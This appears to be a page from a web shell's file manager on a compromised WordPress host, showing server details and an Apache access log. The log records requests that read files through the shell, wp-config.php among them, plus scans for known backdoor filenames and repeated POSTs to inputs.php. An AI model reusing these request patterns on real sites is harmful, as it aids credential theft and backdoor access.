HEX
Server: Apache
System: Linux cds-alphanode.dnscapweb.net 4.18.0-553.63.1.el8_10.x86_64 #1 SMP Mon Jul 21 10:37:28 EDT 2025 x86_64
User: marvidson (1030)
PHP: 8.1.33
Disabled: NONE
$ pwd: /home/marvidson/access-logs/
Upload Files
File: /home/marvidson/access-logs/marvidsonandgoldman.com
43.166.1.243 - - [14/Sep/2025:12:14:59 +0000] "GET /?path=/home/marvidson/public_html/.well-known HTTP/1.1" 200 14251 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.170.13 - - [14/Sep/2025:12:24:23 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-comments-post.php&path=/home/marvidson/public_html HTTP/1.1" 200 15033 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
124.6.51.228 - - [14/Sep/2025:12:25:06 +0000] "HEAD /wp-json/wp/v2/posts HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
124.6.51.228 - - [14/Sep/2025:12:25:06 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
43.135.145.73 - - [14/Sep/2025:12:35:24 +0000] "GET /?path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 168866 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.140.157 - - [14/Sep/2025:12:44:32 +0000] "GET /?path=/home/marvidson/public_html/.well-known/acme-challenge HTTP/1.1" 200 12907 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.253.94 - - [14/Sep/2025:12:55:14 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-admin/admin-post.php&path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 14627 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.95.239 - - [14/Sep/2025:13:04:34 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-admin/async-upload.php&path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 18640 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.12.58 - - [14/Sep/2025:13:16:38 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-admin/credits.php&path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 18159 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.129.131 - - [14/Sep/2025:13:25:43 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-admin/edit-form-comment.php&path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 24301 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
84.246.85.11 - - [14/Sep/2025:13:27:44 +0000] "GET / HTTP/1.1" 200 52570 "-" "2ip bot/1.1 (+http://2ip.io)"
84.246.85.11 - - [14/Sep/2025:13:27:45 +0000] "GET / HTTP/1.1" 200 52570 "-" "2ip bot/1.1 (+http://2ip.io)"
84.246.85.11 - - [14/Sep/2025:13:27:46 +0000] "GET / HTTP/1.1" 200 52570 "-" "2ip bot/1.1 (+http://2ip.io)"
170.106.165.186 - - [14/Sep/2025:13:35:08 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-admin/edit-tags.php&path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 40419 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
129.226.93.214 - - [14/Sep/2025:13:44:17 +0000] "GET /about.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
35.203.156.1 - - [14/Sep/2025:13:46:41 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:41 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:42 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:42 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:43 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:43 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:44 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:44 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:45 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:45 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:46 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:46 +0000] "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:46 +0000] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:47 +0000] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:47 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:48 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:48 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:49 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:49 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.203.156.1 - - [14/Sep/2025:13:46:49 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
43.130.57.46 - - [14/Sep/2025:13:56:40 +0000] "GET /contribute.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
118.179.19.212 - - [14/Sep/2025:14:03:56 +0000] "GET /wp-login.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0"
74.241.242.73 - - [14/Sep/2025:14:14:01 +0000] "GET /file.php HTTP/1.1" 403 52570 "-" "-"
43.130.228.73 - - [14/Sep/2025:14:14:51 +0000] "GET /privacy.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.113.235 - - [14/Sep/2025:14:24:28 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-admin/edit-form-comment.php&path=/home/marvidson/public_html/wp-admin HTTP/1.1" 200 24301 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
20.39.201.203 - - [14/Sep/2025:14:28:56 +0000] "GET //wp-content/plugins/fix/up.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:10 +0000] "GET /wp-content/uploads/2017-------/09/wp-console.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:11 +0000] "GET /wp-includes/js/crop/uword.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:12 +0000] "GET /wp-content/themes/bltm/wp-login.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:13 +0000] "GET /autoload_classmap.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:14 +0000] "GET /wp-content/uploads/2014/07/olx.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:16 +0000] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:17 +0000] "GET /wp-content/uploads/2020/wp-couldent.php.suspected HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:18 +0000] "GET /wp-content/plugins/523453244/ninja.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:19 +0000] "GET /wp-includes/js/imgareaselect/index.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:20 +0000] "GET /wp-includes/PHPMailer/load.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:22 +0000] "GET /wp-links.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:23 +0000] "GET /wp-aa.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:24 +0000] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:25 +0000] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:26 +0000] "GET /about.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:28 +0000] "GET /xx.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:29 +0000] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:30 +0000] "GET /epinyins.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:31 +0000] "GET /wp-admin/dropdown.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:32 +0000] "GET /dropdown.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:34 +0000] "GET /wp-admin/css/index.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:35 +0000] "GET /wp-content/mah.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:36 +0000] "GET /wp-content/item.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:37 +0000] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:38 +0000] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:40 +0000] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:41 +0000] "GET /wp-content/plugins/ph-file-manager/wp-file.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:42 +0000] "GET /wp-content/plugins/root-file-manager/wp-file.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
207.211.158.76 - - [14/Sep/2025:15:07:43 +0000] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
114.117.233.112 - - [14/Sep/2025:15:51:40 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.140.110 - - [14/Sep/2025:16:13:09 +0000] "GET / HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.247.82 - - [14/Sep/2025:16:27:11 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-config-sample.php&path=/home/marvidson/public_html HTTP/1.1" 200 16078 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.133.194 - - [14/Sep/2025:16:40:15 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-mail.php&path=/home/marvidson/public_html HTTP/1.1" 200 22252 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
20.51.151.252 - - [14/Sep/2025:16:46:42 +0000] "GET /alles-uber-gewinnchancen-im-jackpotpiraten-casino/ HTTP/1.0" 200 52570 "https://marvidsonandgoldman.com/" "Mozilla/5.0 (X11; Linux i686; rv:114.0) Gecko/20100101 Firefox/114.0"
20.51.151.252 - - [14/Sep/2025:16:46:44 +0000] "GET /alles-uber-gewinnchancen-im-jackpotpiraten-casino/?fileloc=/home/marvidson/public_html/fa9a7ba3d8e48b74b57af9e70aa419ab&path=/home/marvidson/public_html HTTP/1.0" 200 12432 "https://marvidsonandgoldman.com/alles-uber-gewinnchancen-im-jackpotpiraten-casino/" "Mozilla/5.0 (X11; Linux i686; rv:114.0) Gecko/20100101 Firefox/114.0"
43.130.150.80 - - [14/Sep/2025:16:49:25 +0000] "GET /?fileloc=/home/marvidson/public_html/xmlrpc.php&path=/home/marvidson/public_html HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.157.80 - - [14/Sep/2025:16:58:11 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-config.php&path=/home/marvidson/public_html HTTP/1.1" 200 15950 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.173.1.57 - - [14/Sep/2025:17:09:57 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-login.php&path=/home/marvidson/public_html HTTP/1.1" 200 74869 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.135.203 - - [14/Sep/2025:17:17:55 +0000] "GET /?fileloc=/home/marvidson/public_html/wp-signup.php&path=/home/marvidson/public_html HTTP/1.1" 200 53885 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
20.39.203.17 - - [14/Sep/2025:17:50:17 +0000] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 200 52570 "-" "-"
20.39.203.17 - - [14/Sep/2025:17:50:18 +0000] "GET /file8.php HTTP/1.1" 403 52570 "-" "-"
20.39.203.17 - - [14/Sep/2025:17:50:19 +0000] "GET /ahax.php HTTP/1.1" 403 52570 "-" "-"
20.39.203.17 - - [14/Sep/2025:17:50:19 +0000] "GET /wp-content/plugins/lwbdene/index.php HTTP/1.1" 200 52570 "-" "-"
104.28.240.85 - - [14/Sep/2025:18:02:52 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:02:53 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:02:54 +0000] "GET /.htaccess HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
181.91.86.208 - - [14/Sep/2025:18:15:52 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
104.28.240.85 - - [14/Sep/2025:18:16:48 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:48 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:49 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:49 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:50 +0000] "GET /q1.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:50 +0000] "GET /ncx.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:51 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:51 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:52 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:52 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:53 +0000] "GET /q1.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:16:53 +0000] "GET /ncx.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:40:37 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:40:38 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:40:39 +0000] "GET /witmm.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:40:40 +0000] "GET /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:40:41 +0000] "POST /inputs.php HTTP/1.1" 200 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
104.28.240.85 - - [14/Sep/2025:18:40:42 +0000] "GET /witmm.php HTTP/1.1" 403 52570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
